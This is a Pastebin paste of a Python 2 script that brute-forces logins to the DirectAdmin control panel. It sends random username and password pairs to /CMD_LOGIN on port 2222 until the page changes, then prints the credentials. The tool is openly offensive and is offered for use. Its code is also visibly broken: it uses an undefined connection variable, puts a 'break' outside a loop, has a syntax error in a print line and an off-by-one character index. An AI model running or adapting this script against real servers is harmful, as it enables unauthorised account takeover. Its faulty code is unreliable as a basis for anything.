Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Direct Admin Brute Force Program
- import httplib, urllib, random
- def da_bf(url, username_length, password_length):
- chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
- full_url = url + ':2222'
- conn_da = httplib.HTTPConnection(full_url)
- headers = {'Content-type' : 'application/x-www-form-urlencoded', 'Accept' : 'text/plain'}
- conn_da.request('GET', '/CMD_LOGIN')
- get_page_content = conn.getresponse()
- if (get_page_content.status == 200):
- regular_page_content = get_page_content.read()
- else:
- print(get_page_content.status + get_page_content.reason + '\n')
- break
- conn_da.request('POST', '/CMD_LOGIN', urllib.urlencode({'username' : ' ', 'password' : ' '}), headers)
- get_error_page = conn_da.getresponse()
- error_page_content = get_error_page.read()
- conn_da.request('GET', '/CMD_LOGIN')
- get_content_main = conn_da.getresponse()
- main_page_content = get_content_main.read()
- while (main_page_content == regular_page_content or main_page_content == error_page_content):
- random_length_username = random.randint(1, username_length)
- random_char_number = 1
- random_string_username = ''
- while (random_char_number < random_length_username):
- random_char_username = chars[random.randint(0, len(chars))]
- random_string_username = random_string_username + random_char_username
- random_char_number = random_char_number + 1
- random_char_number = 1
- random_length_password = random.randint(1, password_length) # generate a random length for the password
- random_string_password = ''
- while (random_char_number < random_length_password):
- random_char_password = chars[random.randint(0, len(chars))]
- random_string_password = random_string_password + random_char_password
- random_char_number = random_char_number + 1
- print("trying username " + random_string_username " with password " + random_string_password + "\n")
- params = urllib.urlencode({'username' : random_string_username, 'password' : random_string_password})
- conn_da.request('POST', '/CMD_LOGIN', params, headers)
- get_r = conn_da.getresponse()
- resp = get_r.read()
- main_page_content = resp
- if (main_page_content != regular_page_content and main_page_content != error_page_content):
- print('Brute force succeeded! Username: ' + random_string_username + '\nPassword: ' + random_string_password + '\n' + full_url)
- break
- else:
- pass
- conn_da.close()
- da_url = raw_input('enter url:\n')
- da_u_length = input('enter username max length:\n')
- da_p_length = input('enter password max length:\n')
- da_bf(da_url, da_u_length, da_p_length)
- raw_input()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement